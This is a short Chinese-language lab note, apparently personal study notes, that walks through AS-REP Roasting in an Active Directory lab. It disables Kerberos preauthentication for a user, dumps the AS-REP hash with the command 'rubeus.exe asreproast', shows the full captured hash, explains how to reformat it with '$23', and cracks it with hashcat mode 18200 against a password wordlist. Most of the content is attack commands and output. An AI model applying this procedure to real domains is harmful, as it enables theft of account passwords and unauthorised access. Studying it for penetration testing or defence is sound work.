# AS REPRoasting **配置** 给域用户fileserver配置不求kerberos预身份验证（Do not require Kerberos preauthentication） ![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1673490249763.png)

**利用** 直接执行Rubeus获取设置了该选项的用户的hash ``` rubeus.exe asreproast ```

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1673490378140.png) 拼接hash，在`$krb5asrep`后面加一个$23 ``` 复制拼接 $krb5asrep$fileserver@fbi.gov:6BB9690E3DCA4EF848721AE4BCBF3B96$16A7623911CE088AD268E9B684C104C2882F3242D32652DCD81212374C7639DC8E88308397EC3BE54C1CAEAB9BFF185712DAEDF2C57D0A83C86A7F90AD4E5096524080E9B210C8A54DEFD697EE3DB606E6403C71F31094A038A39604EC3BF63962590437155551F5D784C181D88DCBCED43279C6E737562F8AF9910E80896B4BB85540BCDFFC2693396B59BBDFB102B9DBE3960D7913308DB6D6AF38EC52C8611AC35C731A884C7F62E000D444B91DA958F653BEFFE042ACF73E0127FF1B8D75D895A1A31776C63920BB9B3CCFF4F48DE69876A6CA7EE8FB67CEE1ADAE06AE19FC3E 添加$23 $krb5asrep$23$fileserver@fbi.gov:6BB9690E3DCA4EF848721AE4BCBF3B96$16A7623911CE088AD268E9B684C104C2882F3242D32652DCD81212374C7639DC8E88308397EC3BE54C1CAEAB9BFF185712DAEDF2C57D0A83C86A7F90AD4E5096524080E9B210C8A54DEFD697EE3DB606E6403C71F31094A038A39604EC3BF63962590437155551F5D784C181D88DCBCED43279C6E737562F8AF9910E80896B4BB85540BCDFFC2693396B59BBDFB102B9DBE3960D7913308DB6D6AF38EC52C8611AC35C731A884C7F62E000D444B91DA958F653BEFFE042ACF73E0127FF1B8D75D895A1A31776C63920BB9B3CCFF4F48DE69876A6CA7EE8FB67CEE1ADAE06AE19FC3E ``` hashcat爆破并查看结果 ``` 把hash放在hash.txt,密码字典放在pwd.txt,爆破 hashcat.exe -m 18200 hash.txt pwd.txt --force 查看结果（也可以在hashcat.potfile中查看） hashcat hash.txt --show ```

![](C:%5CUsers%5Cice%5CDesktop%5CRain1_lce%5C%E5%9B%BE%E7%89%87%5C1673491476016.png)